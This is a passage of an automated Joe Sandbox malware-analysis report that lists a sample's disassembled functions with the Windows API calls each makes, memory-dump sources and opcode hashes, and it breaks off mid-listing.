                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DialogLongNtdllProc_Window
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2065330234-0
                                                                                                                                                          • Opcode ID: f1ca3e03f37c599a7b86934fda151c664418c1237ff16dc6d1d55fe4e63e90c7
                                                                                                                                                          • Instruction ID: fc4ed487a15b95b069a1be82ca9256c33610cbe98fa14b7beac319c1ed41377d
                                                                                                                                                          • Opcode Fuzzy Hash: f1ca3e03f37c599a7b86934fda151c664418c1237ff16dc6d1d55fe4e63e90c7
                                                                                                                                                          • Instruction Fuzzy Hash: D9E0CD70104218BBEB141F09EC19F7D3B54F700750F108519F917C84E1D7B085D1D760
                                                                                                                                                          Function 00148E3C Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,0012125D,00147A43,00120F35,?,?,00000001), ref: 00148E41
                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00148E4A
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3192549508-0
                                                                                                                                                          • Opcode ID: c3714fa8c42de0172186f4764dad22caa570f7c08a82331309dd956e3bde0956
                                                                                                                                                          • Instruction ID: 0becffcc53f8483fa00d00ed2dc49b34e4915ca2f858ec7325886ef4b796fb80
                                                                                                                                                          • Opcode Fuzzy Hash: c3714fa8c42de0172186f4764dad22caa570f7c08a82331309dd956e3bde0956
                                                                                                                                                          • Instruction Fuzzy Hash: 5DB092B1044E08ABEE006BA1FC09B883F68FF0AA62F014010F61E44C608BA354908A92
                                                                                                                                                          Function 0015113E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: a9f84d7c4b1863af350d9b494700cb1d2a02fd78791a7fc6d120cd1bcd3ece03
                                                                                                                                                          • Instruction ID: e86158683619d90942599f94649de03da7080b4b7b7c18198fd6a63a2e3d5988
                                                                                                                                                          • Opcode Fuzzy Hash: a9f84d7c4b1863af350d9b494700cb1d2a02fd78791a7fc6d120cd1bcd3ece03
                                                                                                                                                          • Instruction Fuzzy Hash: F5B1D020E2AF404DD723A6398871336B65DAFBB2D5F91D71BFC2A74D62EB2185C34180
                                                                                                                                                          Function 001902AA Relevance: 1.6, APIs: 1, Instructions: 64nativeCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0013AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0013AF8E
                                                                                                                                                          • NtdllDialogWndProc_W.NTDLL(?,00000112,?,?), ref: 00190352
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DialogLongNtdllProc_Window
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2065330234-0
                                                                                                                                                          • Opcode ID: 211ccbd04425787679fe8316eca38570b5fe60925507ac2621617bba27d44d50
                                                                                                                                                          • Instruction ID: 19fec4f94d44775b01f1306d022d87a4182f9357fcef59395173ccdb404d5217
                                                                                                                                                          • Opcode Fuzzy Hash: 211ccbd04425787679fe8316eca38570b5fe60925507ac2621617bba27d44d50
                                                                                                                                                          • Instruction Fuzzy Hash: E9110131204255BFEF2A6B288C45FBD3B64BB49760F644318F9129A5E2CB619F40D2A9
                                                                                                                                                          Function 0018E769 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0013B155: GetWindowLongW.USER32(?,000000EB), ref: 0013B166
                                                                                                                                                          • CallWindowProcW.USER32(?,?,00000020,?,?), ref: 0018E7AF
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window$CallLongProc
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4084987330-0
                                                                                                                                                          • Opcode ID: f150d7b478a817304683f5c9695358a0159902cec60891aac6b55e68adf66c71
                                                                                                                                                          • Instruction ID: 2809df18a92943ed545581c30de0686088489bb109320ef0aae0891ecc3cd0a1
                                                                                                                                                          • Opcode Fuzzy Hash: f150d7b478a817304683f5c9695358a0159902cec60891aac6b55e68adf66c71
                                                                                                                                                          • Instruction Fuzzy Hash: 45F0FF36204108FFCF09AF54EC44D793BE6EB05360B044514FE159A6A1D7329E70EF90
                                                                                                                                                          Function 0018EA4E Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0013AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0013AF8E
                                                                                                                                                            • Part of subcall function 0013B736: GetCursorPos.USER32(000000FF), ref: 0013B749
                                                                                                                                                            • Part of subcall function 0013B736: ScreenToClient.USER32(00000000,000000FF), ref: 0013B766
                                                                                                                                                            • Part of subcall function 0013B736: GetAsyncKeyState.USER32(00000001), ref: 0013B78B
                                                                                                                                                            • Part of subcall function 0013B736: GetAsyncKeyState.USER32(00000002), ref: 0013B799
                                                                                                                                                          • NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,0019F417,?,?,?,?,?,00000001,?), ref: 0018EA9C
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2356834413-0
                                                                                                                                                          • Opcode ID: 468929288f9a5f2ab3daf16923d9339df08e03ed9bde465454c1e690f2b21e56
                                                                                                                                                          • Instruction ID: 04e6b3ec9d31c90ea6f63c001b5eb6d4dd350bc38541003d4a051aabf9414ead
                                                                                                                                                          • Opcode Fuzzy Hash: 468929288f9a5f2ab3daf16923d9339df08e03ed9bde465454c1e690f2b21e56
                                                                                                                                                          • Instruction Fuzzy Hash: 6AF08C35200229BBDB18AF19DC4AEBE3FA5FB00B90F044015F91A6B1A1D77699A1DBD1
                                                                                                                                                          Function 0013B7F2 Relevance: 1.5, APIs: 1, Instructions: 28nativeCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0013AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0013AF8E
                                                                                                                                                          • NtdllDialogWndProc_W.NTDLL(?,00000006,?,?,?,?,0013AF40,?,?,?,?,?), ref: 0013B83B
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DialogLongNtdllProc_Window
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2065330234-0
                                                                                                                                                          • Opcode ID: 5a940675029ac2d0117c4ebc24bd4efc6a39053e5549ff893ea3324fc5956bb1
                                                                                                                                                          • Instruction ID: c23ee07db3d8e2182647c0855fdcbd04f1e6e1c8b185786f1339cfb7811b6cca
                                                                                                                                                          • Opcode Fuzzy Hash: 5a940675029ac2d0117c4ebc24bd4efc6a39053e5549ff893ea3324fc5956bb1
                                                                                                                                                          • Instruction Fuzzy Hash: F1F05E30600249AFDF189F54D890D3D3BA6FB05360F144229F9528B6B1D771D8A0DB50
                                                                                                                                                          Function 0017703C Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • BlockInput.USER32(00000001), ref: 00177057
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: BlockInput
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3456056419-0
                                                                                                                                                          • Opcode ID: e3099408eb11b5251391a7b7ba6871ad602cecb3bb292d6c910c3b245cb1cb02
                                                                                                                                                          • Instruction ID: a572c3924940dd2f08742b0070e85a6abb5f43be27cf7cad392302c568cc3e5e
                                                                                                                                                          • Opcode Fuzzy Hash: e3099408eb11b5251391a7b7ba6871ad602cecb3bb292d6c910c3b245cb1cb02
                                                                                                                                                          • Instruction Fuzzy Hash: 31E048363042145FC710EFA9D408D96F7EC9F65750F11C426FA49D7291DBB0E9408B90
                                                                                                                                                          Function 0018F3DA Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 0018F41A
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DialogNtdllProc_
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3239928679-0
                                                                                                                                                          • Opcode ID: e55ebaf742bfdf7b0506cd03aa3f9a45c8fe862e1b2de26d2f90c423fd104be1
                                                                                                                                                          • Instruction ID: d4156eabb8cec88c6c668a82edf602dd2cdcdc159317fb15a8a6cb94686e55b2
                                                                                                                                                          • Opcode Fuzzy Hash: e55ebaf742bfdf7b0506cd03aa3f9a45c8fe862e1b2de26d2f90c423fd104be1
                                                                                                                                                          • Instruction Fuzzy Hash: A0F09231200689BFDB21EF58DC45FCA3BA5FB06360F044419FA11672E1CB707920DB64
                                                                                                                                                          Function 00167DD5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00167DF8
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: mouse_event
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2434400541-0
                                                                                                                                                          • Opcode ID: e3aa2f4d0a41896cb291cd02aeb37d0de33399774129f40fc510dcf158e37be3
                                                                                                                                                          • Instruction ID: 48003de7833e1147cf1f3613f4e7a334b729f866ea8320c7f7df37eab622a6b7
                                                                                                                                                          • Opcode Fuzzy Hash: e3aa2f4d0a41896cb291cd02aeb37d0de33399774129f40fc510dcf158e37be3
                                                                                                                                                          • Instruction Fuzzy Hash: 11D0A7A017C60679FD1C07A4AC2FF3B0218EB017C9FA14E49B102C60C1EFD46C605034
                                                                                                                                                          Function 0013AC99 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0013AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0013AF8E
                                                                                                                                                          • NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?), ref: 0013ACC7
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DialogLongNtdllProc_Window
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2065330234-0
                                                                                                                                                          • Opcode ID: 28b9fe2255974388baea7c1c91ce830b9a499b6a7bb5e1212db2c9d7faea8e66
                                                                                                                                                          • Instruction ID: 5f03a9ff25ba3e2fc9f006699a25e5ec6c93ed6fe97e60bf6e557908eb2e4eee
                                                                                                                                                          • Opcode Fuzzy Hash: 28b9fe2255974388baea7c1c91ce830b9a499b6a7bb5e1212db2c9d7faea8e66
                                                                                                                                                          • Instruction Fuzzy Hash: 3AE0EC35600208FBCF05AF90DC51E6C3B6AFF59394F508418F6465A6A1CB33A562EB51
                                                                                                                                                          Function 0018F425 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,0019F3D4,?,?,?,?,?,?), ref: 0018F450
                                                                                                                                                            • Part of subcall function 0018E13E: _memset.LIBCMT ref: 0018E14D
                                                                                                                                                            • Part of subcall function 0018E13E: _memset.LIBCMT ref: 0018E15C
                                                                                                                                                            • Part of subcall function 0018E13E: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,001E3EE0,001E3F24), ref: 0018E18B
                                                                                                                                                            • Part of subcall function 0018E13E: CloseHandle.KERNEL32 ref: 0018E19D
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
